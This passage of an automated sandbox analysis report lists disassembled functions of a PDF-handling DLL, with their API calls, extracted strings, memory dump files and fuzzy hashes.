FPDFPageObj_GetType.IEPDF32(?), ref: 6CBD248D
FPDFPageObj_GetType.IEPDF32(?,?,?), ref: 6CBD263A

Strings

Rect, xrefs: 6CBD26D7
Subtype, xrefs: 6CBD2530
Link, xrefs: 6CBD2548

Memory Dump Source

Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd

Similarity

API ID: Obj_PageType
String ID: Link$Rect$Subtype
API String ID: 1809354570-3862875103
Opcode ID: ea08ca40545f0128bf0db6a39c222a6df8c7dfd8bed8326e669f03cbc182055e
Instruction ID: caf8dffb94394cf0afb2fd8b94f98bd7a6e1c6e47b6bb348c094241b482df0e1
Opcode Fuzzy Hash: ea08ca40545f0128bf0db6a39c222a6df8c7dfd8bed8326e669f03cbc182055e
Instruction Fuzzy Hash: 08C1F571B002999FDF14CF68C8949BFB7B5EF49618B010429E9166BB41DB30FD09CBA2

Function 6CBCD760 Relevance: 9.1, APIs: 3, Strings: 2, Instructions: 385
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FPDFAnnot_HasAttachmentPoints.IEPDF32(?), ref: 6CBCD777

Part of subcall function 6CBCCEE0: FPDFAnnot_GetSubtype.IEPDF32(?,?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 6CBCCEEB

FPDFAnnot_HasAttachmentPoints.IEPDF32(?), ref: 6CBCD80A
FPDFAnnot_HasAttachmentPoints.IEPDF32(00000000,?,?,Rect), ref: 6CBCD915

Strings

Rect, xrefs: 6CBCD8F7, 6CBCDAD0
BBox, xrefs: 6CBCD98A, 6CBCDA00

Memory Dump Source

Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd

Similarity

API ID: Annot_$AttachmentPoints$Subtype
String ID: BBox$Rect
API String ID: 2680163206-3854271352
Opcode ID: b119691c816e1f4ebd9c458605a8cb1a045d2da63aea69b77b9c68d9da403d24
Instruction ID: 50476ec39eb9d7ab882086bc002ca4d72f728544c22adee822677a844abc5f0c
Opcode Fuzzy Hash: b119691c816e1f4ebd9c458605a8cb1a045d2da63aea69b77b9c68d9da403d24
Instruction Fuzzy Hash: 8AC1FA79B012499FDB10CF75D980AAE77B5FF89708F10051CE919ABB40DB70E909C7A2

Function 6CBCE610 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 327COMMON

Download Yara Rule

Strings

Type, xrefs: 6CBCF1E9
Annot, xrefs: 6CBCF201

Memory Dump Source

Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd

Similarity

API ID:
String ID: Annot$Type
API String ID: 0-395718979
Opcode ID: cf1b1e30d527158db2ca3673770b9bc7bfdb50fa83a3c54889d2e7082862c3bc
Instruction ID: 20f02797c642adaebfe8ab236cd19591a72d4400f596dc52749d2af939afeb15
Opcode Fuzzy Hash: cf1b1e30d527158db2ca3673770b9bc7bfdb50fa83a3c54889d2e7082862c3bc
Instruction Fuzzy Hash: 80B1D675B00258CFEB14CF65C9817AEB7B5FF89704F008859D919AB740EB309D0ACB92

Function 6CD4A7D6 Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 6CD4A8CE
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6CD4A8D8
UnhandledExceptionFilter.KERNEL32(?), ref: 6CD4A8E5

Memory Dump Source

Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 20b2923dc6a211139a759e0075ea88bce17ed65dc544cc9418ac900a10fa3e00
Instruction ID: 04e992bd37a6d0f3b3fde03129daa5506087da36eaa192ffe43518423dc120ac
Opcode Fuzzy Hash: 20b2923dc6a211139a759e0075ea88bce17ed65dc544cc9418ac900a10fa3e00
Instruction Fuzzy Hash: DA31F27490122CABCB61DF64C888BCCBBB8BF08314F5081EAE51CA7260E7749F858F54

Function 6CAF7104 Relevance: 2.6, Strings: 2, Instructions: 73COMMON

Download Yara Rule

Strings

F, xrefs: 6CAF71B0
7, xrefs: 6CAF71A8

Memory Dump Source

Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd

Similarity

API ID:
String ID: 7$F
API String ID: 0-2956078852
Opcode ID: 35f44488e7151a4f7c36dc4fe382e0a7814bdfc3b63c3aae44167d024a917e88
Instruction ID: 6e1558239bae48d94e440ccd519b9356a92c64e47b10dc9c1926fbeab33f7498
Opcode Fuzzy Hash: 35f44488e7151a4f7c36dc4fe382e0a7814bdfc3b63c3aae44167d024a917e88
Instruction Fuzzy Hash: 8B31D474E09259DFCB15CFA8D980A9DBBF0FF0A304F14009AE815EB311D335AA4ACB25

Function 6CBF19F0 Relevance: 37.7, APIs: 30, Instructions: 171
sleepmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,00000000,?,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000), ref: 6CBF1A0B
GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1A38
Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1A56
VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1A64
GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1A72
Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1A90
VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1A9E
GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1AAC
Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1ACA
VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1AD8
GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1AE6
Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1B04
VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1B12
GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1B20
Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1B3E
VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1B4C
GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1B5A
Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1B78
VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1B86
GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1B94
Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1BB2
VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1BC0
GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1BCE
Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1BE8
VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1BF6
GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1C00
Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1C1A
VirtualAlloc.KERNEL32(00000003,00000000,?,6CBF3660,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1C28
GetLastError.KERNEL32(?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1C32
Sleep.KERNEL32(00000032,?,6CBF22B7,00000000,?,00001000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF1C4C

Memory Dump Source

Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd

Similarity

API ID: AllocErrorLastSleepVirtual
String ID:
API String ID: 2288223010-0
Opcode ID: 7acebf5aa351ddcd91a2f36398c3ec7d187d2f40ba9ae2ba950b642f628970e5
Instruction ID: 8b4607a51f2a0ac8bd02ea1ae09f26c51e592a3f1b69f70f1b4b0150fbf0922f
Opcode Fuzzy Hash: 7acebf5aa351ddcd91a2f36398c3ec7d187d2f40ba9ae2ba950b642f628970e5
Instruction Fuzzy Hash: 79516F70715142AFCF214E92CD1DB9E3F79FF46399F184828FA2A98550D739C54ACB22

Function 6CBF53E0 Relevance: 19.3, APIs: 2, Strings: 9, Instructions: 88
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 6CBF541E
IsWow64Process.KERNEL32(00000000,00000000), ref: 6CBF542A

Strings

iswo, xrefs: 6CBF5457
it, xrefs: 6CBF54EA
comm, xrefs: 6CBF54FA, 6CBF54FE
allo, xrefs: 6CBF54B9
c, xrefs: 6CBF54B1
ize, xrefs: 6CBF5482
size, xrefs: 6CBF551E
w64, xrefs: 6CBF544F
va_s, xrefs: 6CBF548A

Memory Dump Source

Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd

Similarity

API ID: Process$CurrentWow64
String ID: allo$c$comm$iswo$it$ize$size$va_s$w64
API String ID: 1905925150-3570837082
Opcode ID: 7bd8e93bb75e07341b2aad1e93c6b042f6e3ce6dcd04ba9645c1a598b4f233a9
Instruction ID: 9d6c5aebfc40692fc208e0085b0a602eb9cb252cbf97d34a290a5c11f5b06115
Opcode Fuzzy Hash: 7bd8e93bb75e07341b2aad1e93c6b042f6e3ce6dcd04ba9645c1a598b4f233a9
Instruction Fuzzy Hash: F0315EB59083409BD704CFA4D485B9BBBF9BB85308F144A2DF5A987300D7B6E90D8B83

Function 6CBF1090 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 264
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 6CBF10D0
K32EnumProcessModules.KERNEL32(?,00000000,00000000,?), ref: 6CBF1119
LocalAlloc.KERNEL32(00000040,?,?,00000000,00000000,?), ref: 6CBF1134
K32EnumProcessModules.KERNEL32(?,00000000,?,?), ref: 6CBF1150
K32GetModuleInformation.KERNEL32(?,00000000,?,0000000C), ref: 6CBF11B1
K32GetModuleFileNameExA.KERNEL32(?,?,?,00000104), ref: 6CBF138D

Strings

#%d 0x%x <unknown>, xrefs: 6CBF14A3
#%d 0x%x (%s+0x%x), xrefs: 6CBF131A

Memory Dump Source

Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEBF000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CED4000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEFC000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF04000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CF14000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502289924.000000006CF2F000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502320816.000000006CF33000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502343085.000000006CF3B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502360754.000000006CF3F000.00000020.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1502381783.000000006CF40000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6caf0000_hv.jbxd

Similarity

API ID: Process$EnumModuleModules$AllocFileInformationLocalNameOpen
String ID: #%d 0x%x (%s+0x%x)$#%d 0x%x <unknown>
API String ID: 2294107655-2545250934
Opcode ID: 55f9941d9e40c45c38e5d0d5cb117e9d9df6c20dd1fedd224506498bdd865692
Instruction ID: ae94eeb8eab409cd505f28a8f29bb7f36b1a4ea3bf83504eb5ec96084dfff3e6
Opcode Fuzzy Hash: 55f9941d9e40c45c38e5d0d5cb117e9d9df6c20dd1fedd224506498bdd865692
Instruction Fuzzy Hash: 92C151B1910F819AE330CF25C885BA3F7E4BB99314F100B1DE5EA86A91DBB1F549C790

Function 6CBF2270 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 87
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualFree.KERNEL32(00000003,00000000,00004000,?,6CBF3660,?,00000000,00000003,00000000), ref: 6CBF228F
TryAcquireSRWLockExclusive.KERNEL32(6CF3A804), ref: 6CBF22EB
VirtualFree.KERNEL32(?,00000000,00008000), ref: 6CBF2317
ReleaseSRWLockExclusive.KERNEL32(6CF3A804), ref: 6CBF2370

Strings

..\base\allocator\partition_allocator\page_allocator_internals_win.h, xrefs: 6CBF2333
..\base\allocator\partition_allocator\page_allocator_internals_win.h(100) PA_NOTREACHED() hit., xrefs: 6CBF22C1
VirtualFree(reinterpret_cast<void*>(address), 0, 0x00008000), xrefs: 6CBF2329

Memory Dump Source

Source File: 00000002.00000002.1497612258.000000006CAF1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6CAF0000, based on PE: true

Associated: 00000002.00000002.1497564380.000000006CAF0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD5A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD64000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD6F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD76000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CD7A000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.1500335738.000000006CEB9000.00000002.00000001.01000000.00000006.sdmpDownload File
